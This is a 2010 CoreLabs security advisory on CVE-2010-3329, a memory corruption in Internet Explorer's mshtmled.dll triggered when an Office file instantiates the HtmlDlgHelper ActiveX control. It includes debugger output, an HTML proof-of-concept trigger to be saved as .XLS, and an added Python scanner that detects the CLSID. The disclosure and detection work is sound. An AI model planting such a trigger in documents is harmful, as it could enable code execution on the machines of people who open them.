Core Security - CoreLabs
Microsoft Office HtmlDlgHelper class memory corruption
**Title:** Microsoft Office HtmlDlgHelper class memory corruption
**Advisory Id:** CORE-2010-0517
**Advisory URL:** http://www.coresecurity.com/content/MS-Office-HtmlDlgHelper-memory-corruption
**Date published:** 2010-10-12
**Date of last update:** 2010-10-12
**Vendors contacted:** Microsoft
**Release mode:** Coordinated release
**Class:** Buffer Overflow [CWE-119]
**Impact:** Code execution
**Remotely Exploitable:** Yes
**Locally Exploitable:** No
**CVE Name:** CVE-2010-3329
**Bugtraq ID:** N/A
Microsoft Windows is prone to a memory corruption vulnerability when the HtmlDlgHelper Class Object is instantiated from a Microsoft Office document (e.g. .XLS, .DOC). The affected module is part of Internet Explorer (mshtmled.dll). This vulnerability could be used by a remote attacker to execute arbitrary code with the privileges of the user that opened the malicious file.
This vulnerability was discovered by Damián Frizza from Core Security Technologies.
Microsoft Windows is prone to a memory corruption vulnerability when the HtmlDlgHelper Class Object (CLASSID: 3050f4e1-98b5-11cf-bb82-00aa00bdce0b) is instantiated from a Microsoft Office document (e.g. .XLS, .DOC). The affected module is part of Internet Explorer (mshtmled.dll). The vulnerability occurs in mshtmled.dll when the destructor of the CHtmlDlgHelper class is called and accesses uninitialized memory.
The ActiveX control is marked as "Not Safe for Initialization", and Office prompts the user with: "ActiveX controls might contain viruses or other security hazards. Do not enable this content unless you trust the source of this file". However, in Office 2003 the bug is triggered even if the user answers "No" to the prompt.
The following debugger output shows where the vulnerability occurs when a .XLS document is opened in Microsoft Office Excel 2003 (mshtmled.dll v8.0.6001.18702):
```text
mshtmled!ReleaseInterface:
42b919c0 8bff            mov     edi,edi
42b919c2 55              push    ebp
42b919c3 8bec            mov     ebp,esp
42b919c5 8b4508          mov     eax,dword ptr [ebp+8]  ss:0023:0013d104=00310065
42b919c8 85c0            test    eax,eax
42b919ca 7406            je      mshtmled!ReleaseInterface+0x12 (42b919d2)  [br=0]
42b919cc 8b08            mov     ecx,dword ptr [eax]    ds:0023:00310065
42b919ce 50              push    eax
42b919cf ff5108          call    dword ptr [ecx+8]      ds:0023:7d02029c=2a2c277a

eax=00310065 ebx=00000000 ecx=7d020294 edx=df0b3d60 esi=001edbdc edi=00000000
eip=2a2c277a esp=0013d0f4 ebp=0013d0fc iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206

Stack Trace:
<Unloaded_ion.dll>+0x2a2c2779
mshtmled!ReleaseInterface+0x12
mshtmled!CHtmlDlgHelper::~CHtmlDlgHelper+0x10
mshtmled!ATL::CComAggObject<CHtmlDlgHelper>::`scalar deleting destructor'+0xd
mshtmled!ATL::CComAggObject<CHtmlDlgHelper>::Release+0x27
VBE6!rtcStrConvVar+0xbd65
VBE6!rtcSetDatabaseLcid+0xa823
EXCEL!Ordinal41+0xd2ad0
EXCEL!Ordinal41+0x14082a
USER32!CallWindowProcW+0x1b

Instruction Address: 0x000000002a2c277a
```
The following HTML code demonstrates the bug on Excel 2002/2003. Save the file with a .XLS extension and open it in Excel.
```html
<html xmlns:v="urn:schemas-microsoft-com:vml"
      xmlns:o="urn:schemas-microsoft-com:office:office"
      xmlns:x="urn:schemas-microsoft-com:office:excel">
<head>
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta name=ProgId content=Excel.Sheet>
<meta name=Generator content="Microsoft Excel 10">
</head>
<body link=blue vlink=purple>
<table border="0" width="64">
<col width="64">
<tr>
<td width="64" align="left" valign="top"><![if !vml]><span><![endif]>
<object classid="CLSID:3050F4E1-98B5-11CF-BB82-00AA00BDCE0B" id=obj></object>
<![if !vml]></span><![endif]><span>
<table>
<tr>
<td width="64"></td>
</tr>
</table>
</span></td>
</tr>
<![if supportMisalignedColumns]>
<tr>
<td width="64"></td>
</tr>
<![endif]>
</table>
</body>
</html>
```
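As an added defensive example (not part of the Core advisory), the following Python scanner flags HTML-format Office documents that instantiate the HtmlDlgHelper CLSID given above; it covers only the HTML form of .XLS/.DOC files shown in the trigger, not binary OLE documents, and the two sample documents are constructed for the demonstration.

```python
import re

# CLSID of the HtmlDlgHelper class named in the advisory (CORE-2010-0517).
HTMLDLGHELPER_CLSID = "3050f4e1-98b5-11cf-bb82-00aa00bdce0b"

# Matches the classid attribute of an <object> tag in HTML-format Office
# documents. Tolerates quoted/unquoted values, the "CLSID:" prefix, braces
# and upper/lower-case hex, so trivial reformatting does not evade it.
_OBJECT_RE = re.compile(
    r"<object\b[^>]*?\bclassid\s*=\s*['\"]?\s*(?:clsid:)?\s*\{?([0-9a-f-]{36})\}?",
    re.IGNORECASE | re.DOTALL,
)


def find_object_clsids(html: str) -> list[str]:
    """Return every CLSID instantiated via <object classid=...>, lower-cased."""
    return [clsid.lower() for clsid in _OBJECT_RE.findall(html)]


def references_htmldlghelper(html: str) -> bool:
    """True if the document instantiates the HtmlDlgHelper ActiveX control."""
    return HTMLDLGHELPER_CLSID in find_object_clsids(html)


def scan_file(path: str) -> bool:
    """Scan an on-disk HTML-format Office document (hypothetical helper)."""
    with open(path, "r", encoding="windows-1252", errors="ignore") as fh:
        return references_htmldlghelper(fh.read())


# Constructed samples: the shape of the trigger above, and a benign sheet.
TRIGGER_DOC = """<html xmlns:x="urn:schemas-microsoft-com:office:excel">
<head><meta name=ProgId content=Excel.Sheet></head>
<body><table><tr><td>
<object classid="CLSID:3050F4E1-98B5-11CF-BB82-00AA00BDCE0B" id=obj></object>
</td></tr></table></body></html>"""

BENIGN_DOC = """<html><head><meta name=ProgId content=Excel.Sheet></head>
<body><table><tr><td>1</td><td>2</td></tr></table></body></html>"""

if __name__ == "__main__":
    for name, doc in (("trigger", TRIGGER_DOC), ("benign", BENIGN_DOC)):
        print(f"{name}: clsids={find_object_clsids(doc)} "
              f"htmldlghelper={references_htmldlghelper(doc)}")
```

A document that hits this check should be treated as untrusted regardless of the "Not Safe for Initialization" prompt, since the advisory notes Office 2003 triggers the bug even when the user declines it.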
This exploitable condition was reproduced in the following versions of mshtmled.dll:
mshtmled.dll v8.0.6001.18702
mshtmled.dll v8.0.6001.18000
mshtmled.dll v7.0.6000.17023
mshtmled.dll v7.0.6000.17080

[1] Microsoft security bulletin summary for October 2010: http://www.microsoft.com/technet/security/bulletin/ms10-oct.mspx
[2] Office killbit: http://support.microsoft.com/kb/983632
[3] This bug was originally investigated in Microsoft Office by Core, but MSRC determined [2010-07-02] that this bug is an exploitable crash in Internet Explorer.
[4] MSRC was not able to reproduce this issue on IE6; however, they notified Core that the code has been determined to exist in this version and that the fix will be scoped to address this platform as well.
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com/.
Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at <http://www.coresecurity.com>.
The contents of this advisory are copyright © 2010 Core Security Technologies and © 2010 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at /legacy/files/attachments/core_security_advisories.asc.